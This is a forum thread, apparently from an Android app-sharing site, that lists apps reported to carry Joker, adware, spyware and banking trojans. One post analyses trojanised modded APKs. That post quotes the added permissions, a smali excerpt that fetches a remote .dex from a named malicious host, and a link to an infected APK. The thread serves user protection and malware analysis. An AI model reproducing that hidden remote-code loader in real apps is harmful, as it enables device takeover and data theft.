Keep yourself informed!
Sep 10th, 2019, 3:05 pm
Alert for new malware detected installed in dozens of applications in the Android Play Store has hit the security company CSIS.
Specifically, the company found that the Joker software is hidden in these applications, which is extremely insidious and ... costly.
Joker secretly writes application users to subscription services so users pay for services they don't use.
Google dumped the infected apps out of the Play Store, but any users who downloaded them should do so right away.

Advocate Wallpaper
Age Face
Altar Message
Antivirus Security - Security Scan
Beach Camera
Board picture editing
Certain Wallpaper
Climate SMS
Collate Face Scanner
Cute Camera
Dazzle Wallpaper
Declare Message
Display Camera
Great VPN
Humour Camera
Ignite Clean
Leaf Face Scanner
Mini Camera
Print Plant scan
Rapid Face Scanner
Reward Clean
Ruddy SMS
Soby Camera
Spark Wallpaper

Extra apps that have been reported that are loaded with adware:

CM Security Applock AntiVirus
Free VPN Master
Funny Sweet Beauty Selfie Camera
HotSpotVPN
Secure VPN
Sun Pro Beauty Camera

Updated 20/7/2022:

Coco Camera v1.1 (com.toomore.cool.camera)
Creative 3D Launcher (app.launcher.creative3d)
Freeglow Camera 1.0.0 (com.glow.camera.open)
Funny Camera (com.okcamera.funny)
Gif Emoji Keyboard (com.gif.emoji.keyboard)
Razer Keyboard & Theme (com.razer.keyboards) not related to the gaming/tech company Razer
Vlog Star Video Editor (com.vlog.star.video.editor)
Wow Beauty Camera (com.wowbeauty.camera)

Updated 27/7/2022

@Jaggu's Mods - Spyware
Releases modded by Jaggu (who is not a releaser on Mobilism) come with spyware capable of stealing sensitive information.

Deezer
TikTok (Unlocked)(In-Built Region Changer)(NoPlugin Need)(Mod)
Remini [Pro]
Reface: Funny face swap videos (Pro)
Spotify [Amoled Mod]
Infinite Painter (Premium)
Gaana Hindi Song Music App [Plus][Mod]
Swift Backup [Premium]
Fluid Simulation [Patched]
Truecaller: Caller ID & Block [Gold]
ExpressVPN - #1 Trusted VPN (Patched)
Alarmy, Challenge Alarm clock [PREMIUM]
CREX - Cricket Exchange [Premium]
Flashcards World [Premium]
Download Accelerator Plus [Premium]
Hidden Eye - intruder selfie [Premium]

Updated 9/12/2022

TubeBox (jiajiamaji) – 1,000,000 downloads
Bluetooth device auto connect (bt auto connect group) – 1,000,000 downloads
Bluetooth & Wi-Fi & USB driver (simple things for everyone) – 100,000 downloads
Volume, Music Equalizer (bt autoconnect group) – 50,000 downloads
Fast Cleaner & Cooling Master (Hippo VPN LLC) – 500 downloads
Sep 10th, 2019, 3:05 pm

Before make a new topic please:
- Read the Site Rules and How to Post a Release
- Use Search Bar for avoid double posts.
- Support developers!
- For PC and Android widgets - Animated Wallpapers check my Deviantart
ImageImage
Sep 21st, 2019, 8:02 pm
Add to that list:
HotSpotVPN
Free VPN Master
Secure VPN
CM Security Applock AntiVirus
Sun Pro Beauty Camera
Funny Sweet Beauty Selfie Camera
Loaded with adware.
Sep 21st, 2019, 8:02 pm

"Snowflake" is a derogatory slang term for a person who has an unwarranted sense of entitlement or are overly-emotional, easily offended, and unable to deal with opposing opinions.
Sep 25th, 2019, 3:38 pm
I`m glad that I don`t install any of this :shock:
Sep 25th, 2019, 3:38 pm
Nov 14th, 2019, 2:31 pm
I was using ai.type keyboard Plus + Emoji for some time :shock: :shock:
Checking my phone rn...
Thank you for the article
Nov 14th, 2019, 2:31 pm
Jan 10th, 2020, 1:28 pm
Lucky, I don't have any of those apps installed.
Jan 10th, 2020, 1:28 pm
Feb 2nd, 2020, 11:24 pm
Malwarebytes has a good front end to detect this stuff at download and again at install. Saved my arse many a time...
Feb 2nd, 2020, 11:24 pm

... knowledge is the thesis of rebellion!
Aug 14th, 2020, 11:59 am
Today Tik Tok app has been ban and removed from iOS and Android (Playstore) for security reasons: So be aware!
Today's article from a trusted source:
With the US accusing TikTok of spying on American citizens and TikTok itself denying any involvement with the Chinese government, a new investigation is coming to make the company's position even more difficult. According to the Wall Street Journal , TikTok tracked the MAC addresses of Android users by the end of last year.
Unlike cookies which can be easily deleted, MAC addresses are unique to each device and are often used in digital advertising to identify devices. TikTok reportedly took advantage of a known Android security vulnerability and stored MAC addresses for at least 15 months. He even used an extra level of encryption to hide this collection.
This data was collected, of course, without the user's consent, in clear violation of Google's terms of use. A Google spokesman said the company was investigating the Journal's findings, but did not comment on the security breach that allowed applications to collect MAC addresses.
TikTok, in turn, did not deny the allegations or answer specific questions and instead issued the following statement stating that the application no longer uses such tactics.
Aug 14th, 2020, 11:59 am

Before make a new topic please:
- Read the Site Rules and How to Post a Release
- Use Search Bar for avoid double posts.
- Support developers!
- For PC and Android widgets - Animated Wallpapers check my Deviantart
ImageImage
Apr 12th, 2021, 11:28 am
Info by @ill420smoker

Hey guys,

I've noticed a dangerous trend in our Android section in the last few months and wanted to share my findings.

While viewing the Android>Games section I would often see the following:
- A brand new user
-- posting perfect topics
-- posting attractive titles
-- posting a few topics in succession
-- never returning to the forum

Of course this immediately sends up a red flag to me.

Upon downloading and inspecting a few of these apps I've noticed there are added .smali files (aka Java classes), which is another red flag. At first I believed this was only ad injection, but it turns out to be much worse.

Take this topic for example:
Idle Miner Tycoon v3.42.0 (Mod Money)
https://forum.mobilism.org/viewtopic.php?f=408&t=4225643

APK:
https://sharemods.com/3ybom9202awx/idle_miner_mod_3.42.0.apk.html

The source of the original mod is AN1.com, and while AN1 does inject their games with adware to profit from their mods this is much more dangerous.

Notable changes:
- Changed startup activity
- Added permissions to Manifest:
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.START_TASKS_FROM_RECENTS"/>
<uses-permission android:name="android.permission.GET_TASKS"/>
<uses-permission android:name="android.permission.REAL_GET_TASKS"/>
<uses-permission android:name="android.permission.REORDER_TASKS"/>
<uses-permission android:name="android.permission.GET_DETAILED_TASKS"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>

The new startup activity downloads another .dex file from the internet:
Code: Select all.method protected varargs a([Ljava/lang/Void;)Ljava/lang/Object;
    .locals 6

    :try_start_0
    new-instance p1, Ljava/net/URL;

    const-string v0, "https://dexapt.com/a/2021-04-11.dex"

    invoke-direct {p1, v0}, Ljava/net/URL;-><init>(Ljava/lang/String;)V

    invoke-virtual {p1}, Ljava/net/URL;->openStream()Ljava/io/InputStream;
...

The website 'dexapt.com' has recently changed from a superficial tech and news website to an app & game site. If you follow the link to https://dexapt.com/a/ you'll see the various .dex files hosted here. Notice the coded .dex file has not been been posted yet. This allows the app to run inconspicuously until they do post it. As some users have reported, Chrome will launch weird webpages after running these apps.

Once the .dex (8k) is available and downloaded it will also download a .dex file (20k) which contains the Metasploit code. After the Metasploit framework is installed, an attacker can remotely execute the following :!:
Image

Moreover, the VirusTotal report for these infected apps/games is clean:
https://www.virustotal.com/gui/file/30b ... af/details
(Notice it's already spread to a2zapk.com)

Metasploit is likely the worst possible malware that a user can be infected with.

An additional search term:
DexClassLoader

I uploaded '2021-03-25.dex' to VT. The two interesting strings are the short links that are launched by Chrome.
https://www.virustotal.com/gui/file/80d ... /detection

- ill420smoker
Apr 12th, 2021, 11:28 am

Before make a new topic please:
- Read the Site Rules and How to Post a Release
- Use Search Bar for avoid double posts.
- Support developers!
- For PC and Android widgets - Animated Wallpapers check my Deviantart
ImageImage
Jul 19th, 2021, 4:33 pm
Info by @(GL)Nihon

It have come to my attention that some people might get some *false positive* warnings while using Huawei devices

As seen: https://forum.mobilism.org/viewtopic.php?f=430&t=4249177&p=8793638#p8793638

See picture:

https://imgur.com/a/rxLox27

Searching through the net that report APK:RepSandbox[trj]||ar

https://www.virustotal.com/gui/file/cfd ... /detection

Well need to look into this

Reports from Huawei:

Meanwhile Huawei really do not give much of an answer except:
Hi fuchs.sigma, thank you for reaching Huawei! we do apologized for any inconvenience caused to you. Accessing unauthorized ads or links may infect your device with Trojans and malware that may secretly install themselves and steal your personal data. Running a virus scan can locate and remove potential threats on your Phone. Therefore, we would suggest to use Phone Manager to scan virus.


And some other sort of direction to pm them rather then giving them any real indication why the app is flagged..

So if you're unsure of using the app uninstall it and wait for another version.

But in the other have even tasker have gotten the app as flagged
Jul 19th, 2021, 4:33 pm

Before make a new topic please:
- Read the Site Rules and How to Post a Release
- Use Search Bar for avoid double posts.
- Support developers!
- For PC and Android widgets - Animated Wallpapers check my Deviantart
ImageImage
Jul 19th, 2021, 5:43 pm
To further add the app itself is clean (intermediate)

See https://www.virustotal.com/gui/file/56c ... 7d/summary
Human Japanese

https://www.virustotal.com/gui/file/d8a ... 57/summary

But the users uploads have more varning which isn't from the original apk

Please do not that the red flag is only due to debug/test keys
Jul 19th, 2021, 5:43 pm

Welcome to the world Nihon Jr 2016-10-15 08.39pm <3

Currently a bit of here. Sorry
Dec 1st, 2021, 11:35 am
Last News

These are the applications that infected 300,000 Android by stealing money

According to a new report posted a few hours ago by ThreatFabric researchers , more than 300,000 Android users have installed infected applications from Google Play , which included malware that was intended to steal money.

Now you wonder how they managed to get through Google security? These applications are mainly QR Readers and PDF Scanners and do the job well they initially promised. However, through updates or with a code that comes down after the first execution, they turn into banking Trojans that try behind the scenes to extract log-in codes, bank details, e-mails or cryptocurrencies.

The following is a list of the applications in question that security researchers have identified as dangerous, along with their pagkage names:

CryptoTracker - cryptolistapp.app.com.cryptotracker
Gym and Fitness Trainer - com.gym.trainer.jeux
Master Scanner Live - com.multifuction.combine.qr
PDF Document Scanner - com.docscanverifier.mobile
PDF Document Scanner Free - com.doscanner.mobile
PDF Document Scanner - Scan to PDF - com.xaviermuches.docscannerpro2
Protection Guard - com.protectionguard.app
QR CreatorScanner - com.ready.qrscanner.mix
QR Scanner - com.qr.barqr.scangen
QR Scanner 2021 - com.qr.code.generate
Two Factor Authenticator - com.flowdivison

It is worth noting that in Android many applications have the same name, so even if something on the list reminds you, you do not need to panic. What we suggest is to check the unique ID of the application (package name). To see this you need to visit the relevant section of your device settings. Of course, if the package name is not visible there, as is the case with Samsung smartphones, you can check with a third-party Package Name Viewer application.

If you have one of the above applications installed, we suggest that you immediately change the passwords to email accounts, subscription services that you have on your mobile and may have your card, such as Netflix, as well as your e-banking codes, if you have banking applications installed.

Finally, it should be noted that these applications now seem to have been withdrawn from Google Play, which despite the twists and turns remains the safest way to obtain applications for the software.
Dec 1st, 2021, 11:35 am

Before make a new topic please:
- Read the Site Rules and How to Post a Release
- Use Search Bar for avoid double posts.
- Support developers!
- For PC and Android widgets - Animated Wallpapers check my Deviantart
ImageImage